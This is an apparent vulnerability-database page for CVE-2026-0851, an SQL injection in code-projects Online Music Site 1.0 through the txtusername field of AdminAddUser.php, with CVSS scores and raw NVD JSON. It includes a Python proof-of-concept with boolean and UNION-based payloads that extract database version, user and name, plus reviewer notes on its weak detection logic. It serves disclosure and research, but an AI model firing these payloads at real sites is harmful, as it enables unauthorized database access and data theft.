Security Vulnerability Report
CVE-2026-0851 CVSS 7.3 HIGH

CVE-2026-0851

Published: 2026-01-12 00:15:53
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was identified in code-projects Online Music Site 1.0. The affected element is an unknown function of the file /Administrator/PHP/AdminAddUser.php. The manipulation of the argument txtusername leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used.

CVSS Details

CVSS Score
7.3 (Secondary-source CVSS 3.1 score; the NVD Primary CVSS 3.1 assessment in the raw JSON below rates the same issue 9.8 CRITICAL)
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:online_music_site:1.0:*:*:*:*:*:*:* - VULNERABLE
code-projects Online Music Site 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-0851 SQL Injection PoC
# Target: code-projects Online Music Site 1.0
# Endpoint: /Administrator/PHP/AdminAddUser.php
# Parameter: txtusername
#
# Reviewer notes on this listing:
# - The target is a hard-coded placeholder hostname; it is not read from argv,
#   so `sys` is imported but never used.
# - Detection below is heuristic (substring matches and a response-length
#   comparison); it can report both false positives and false negatives and
#   does not by itself prove the injection succeeded.
# - extract_database_info() is defined but never called from __main__.

import requests
import sys

# Placeholder base URL of the vulnerable endpoint; the path is the one named
# in the CVE description.
target_url = "http://target-site.com/Administrator/PHP/AdminAddUser.php"


# Basic SQL Injection PoC - Boolean Based
def test_sql_injection() -> bool:
    """Send a benign and a malformed AdminAddUser POST and compare the responses.

    Returns True when one of two weak indicators fires (an 'sql'/'error'
    substring in the response body, or a body-length difference between the
    two requests), False otherwise or when the HTTP request itself fails.
    Every outcome is also printed to stdout.
    """
    # Normal request
    normal_data = {
        'txtusername': 'testuser',
        'txtpassword': 'testpass',
        'txtemail': '[email protected]',
        'btnadd': 'Add User'
    }
    # Malicious payload - SQL Injection test
    # This payload tests for SQL injection vulnerability
    payload = "' OR '1'='1"
    # Identical to normal_data except for the txtusername field, so any
    # difference in the two responses is attributed to that parameter.
    malicious_data = {
        'txtusername': payload,
        'txtpassword': 'testpass',
        'txtemail': '[email protected]',
        'btnadd': 'Add User'
    }
    print("[*] Testing CVE-2026-0851 SQL Injection...")
    print(f"[*] Target: {target_url}")
    try:
        # Send normal request
        normal_response = requests.post(target_url, data=normal_data, timeout=10)
        print(f"[+] Normal request status: {normal_response.status_code}")
        # Send malicious request
        malicious_response = requests.post(target_url, data=malicious_data, timeout=10)
        print(f"[+] Malicious request status: {malicious_response.status_code}")
        # Check for SQL error indicators
        # NOTE(review): matching the bare word 'error' anywhere in the page
        # (navigation text, JavaScript, unrelated validation messages) is
        # enough to return True here, so this branch is prone to false
        # positives and should not be treated as confirmation on its own.
        if 'sql' in malicious_response.text.lower() or 'error' in malicious_response.text.lower():
            print("[!] SQL Injection vulnerability confirmed!")
            print("[!] Server returned SQL error message")
            return True
        # Check for different response behavior
        # NOTE(review): the two submissions carry different usernames, so a
        # length difference can also come from the username being echoed
        # back or from any dynamic page content (timestamps, CSRF tokens).
        if len(malicious_response.text) != len(normal_response.text):
            print("[!] SQL Injection vulnerability confirmed!")
            print("[!] Response length differs between normal and malicious requests")
            return True
        print("[-] Vulnerability not detected with basic test")
        return False
    except requests.exceptions.RequestException as e:
        # Connection errors, timeouts and invalid URLs all land here and are
        # reported as "not detected" rather than as an inconclusive run.
        print(f"[-] Request failed: {e}")
        return False


# UNION-based data extraction example
def extract_database_info() -> str | None:
    """Example: Extract database version using UNION injection

    Posts a second injection string in txtusername and returns the raw
    response body, or None when the request raises. Nothing in this function
    parses the body or verifies that the query was actually executed; the
    printed length is informational only.
    """
    union_payload = "' UNION SELECT NULL,version(),user(),database()-- -"
    data = {
        'txtusername': union_payload,
        'txtpassword': 'test',
        'txtemail': '[email protected]',
        'btnadd': 'Add User'
    }
    try:
        response = requests.post(target_url, data=data, timeout=10)
        print(f"[*] Database extraction response length: {len(response.text)}")
        return response.text
    # NOTE(review): bare except swallows everything, including KeyboardInterrupt
    # and programming errors, and returns None, which callers cannot
    # distinguish from a request that failed for a reportable reason. A
    # narrower `except requests.exceptions.RequestException` would match the
    # handler in test_sql_injection above.
    except:
        return None


# Only the detection routine runs from the command line; the extraction
# helper above is never invoked here.
if __name__ == "__main__":
    test_sql_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0851", "sourceIdentifier": "[email protected]", "published": "2026-01-12T00:15:52.763", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in code-projects Online Music Site 1.0. The affected element is an unknown function of the file /Administrator/PHP/AdminAddUser.php. The manipulation of the argument txtusername leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used."}, {"lang": "es", "value": "Una vulnerabilidad fue identificada en code-projects Online Music Site 1.0. El elemento afectado es una función desconocida del archivo /Administrator/PHP/AdminAddUser.php. La manipulación del argumento txtusername conduce a inyección SQL. La explotación remota del ataque es posible. El exploit está disponible públicamente y podría ser utilizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": 
false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:online_music_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "EEE01F25-5D13-4657-A849-2AA9890C8510"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/tuo159515/sql-injection/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.340446", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.340446", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.733644", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}